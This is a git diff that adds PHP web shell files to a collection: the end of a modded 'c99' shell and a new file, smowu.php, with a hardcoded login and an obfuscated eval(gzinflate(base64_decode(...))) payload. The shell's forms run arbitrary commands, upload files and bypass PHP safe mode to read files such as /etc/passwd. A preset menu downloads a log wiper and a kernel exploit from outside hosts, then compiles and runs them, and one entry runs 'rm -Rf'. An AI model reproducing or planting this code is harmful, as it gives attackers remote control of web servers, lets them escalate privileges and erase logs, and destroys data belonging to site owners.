+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" + ); + //For simple size- and speed-optimization. + $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}} + natsort($images); + $k = array_keys($images); + echo "<center>"; + foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} + echo "</center>"; + } + exit; +} +if ($act == "about") {echo "<center>Undetectable version by <br> Spyk1r4 <br> <img src=\"http://emp3ror.com/images/emplogo1.gif\"></center>";} +?> +</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1> +<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr> +<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> +<br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Shadow's tricks :D </b></a> ::</b></p></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center">Useful Commands + </div> + <form action="<?php echo $surl; ?>"> + <div align="center"> + <input type=hidden name=act value="cmd"> + <input type=hidden name="d" value="<?php echo $dispd; ?>"> + <SELECT NAME="cmd"> + <OPTION VALUE="uname -a">Kernel version + <OPTION VALUE="w">Logged in users + <OPTION VALUE="lastlog">Last to connect + <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins + <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD! + <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/? + <OPTION VALUE="which wget curl w3m lynx">Downloaders? + <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO + <OPTION VALUE="netstat -atup | grep IST">Open ports + <OPTION VALUE="locate gcc">gcc installed? + <OPTION VALUE="rm -Rf">Format box (DANGEROUS) + <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed) + <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2 + <OPTION VALUE="./zap2">WIPELOGS PT3 + <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed) + <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1) + <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2) + <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3) + <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4) + <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5) + </SELECT> + <input type=hidden name="cmd_txt" value="1"> + &nbsp; + <input type=submit name=submit value="Execute"> + <br> + Warning. Kernel may be alerted using higher levels </div> + </form> + </td> + <td width="50%" height="83" valign="top"><center> + <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search"> + <input name="q" type="text" id="q" value="<?php echo wordwrap(php_uname()); ?>"> + <input type="hidden" name="client" value="firefox-a"> + <input type="hidden" name="rls" value="org.mozilla:en-US:official"> + <input type="hidden" name="hl" value="en"> + <input type="hidden" name="hs" value="b7p"> + <input type=submit name="btnG" VALUE="Search"> + </form></center> + </td> +</tr></TABLE><br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Preddy's tricks :D </b></a> ::</b></p></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center">Php Safe-Mode Bypass (Read Files) + </div><br> + <form action="<?php echo $surl; ?>"> + <div align="center"> + File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> + + + + + + + <? + + function rsg_read() + { + $test=""; + $temp=tempnam($test, "cx"); + $file=$_GET['file']; + $get=htmlspecialchars($file); + echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>"; + if(copy("compress.zlib://".$file, $temp)){ + $fichier = fopen($temp, "r"); + $action = fread($fichier, filesize($temp)); + fclose($fichier); + $source=htmlspecialchars($action); + echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>"; + unlink($temp); + } else { + die("<FONT COLOR=\"RED\"><CENTER>Sorry... File + <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have + access.</CENTER></FONT>"); + } + echo "</div>"; + } + + if(isset($_GET['file'])) +{ +rsg_read(); +} + + ?> + + <? + + function rsg_glob() +{ +$chemin=$_GET['directory']; +$files = glob("$chemin*"); +echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>"; +foreach ($files as $filename) { + echo "<pre>"; + echo "$filename\n"; + echo "</pre>"; +} +} + +if(isset($_GET['directory'])) +{ +rsg_glob(); +} + +?> + + <br> + </div> + </form> + </td> + <td width="50%" height="83" valign="top"><center> + <center>Php Safe-Mode Bypass (List Directories): <form action="<?php echo $surl; ?>"> + <div align="center"><br> + Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> + + </form></center> + </td> +</tr></TABLE><br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1> +<tr> + <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> + <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> +</tr> +</table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table> +<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ Shell [ci] . Biz <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>Modded by</b></u></a> K1r4 @ gmail. com| <a href="http://emp3ror.com"><font color="#FF0000">Emp3ror Team</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table> +</body></html><?php chdir($lastdir); exit(); ?> \ No newline at end of file diff --git a/php/PHPshell/م€گc99_madnetم€‘/c99_madnet.jpg b/php/PHPshell/م€گc99_madnetم€‘/c99_madnet.jpg new file mode 100644 index 0000000..d443281 Binary files /dev/null and b/php/PHPshell/م€گc99_madnetم€‘/c99_madnet.jpg differ diff --git a/php/PHPshell/م€گc99_madnetم€‘/c99_madnet2.jpg b/php/PHPshell/م€گc99_madnetم€‘/c99_madnet2.jpg new file mode 100644 index 0000000..3315c93 Binary files /dev/null and b/php/PHPshell/م€گc99_madnetم€‘/c99_madnet2.jpg differ diff --git a/php/PHPshell/م€گc99_madnetم€‘/smowu.php b/php/PHPshell/م€گc99_madnetم€‘/smowu.php new file mode 100644 index 0000000..92ac161 --- /dev/null +++ b/php/PHPshell/م€گc99_madnetم€‘/smowu.php @@ -0,0 +1,7 @@ +<?PHP + //Authentication +$login = "smowu"; //Login +$pass = "smowu"; //Pass +$md5_pass = ""; //If no pass then hash +eval(gzinflate(base64_decode('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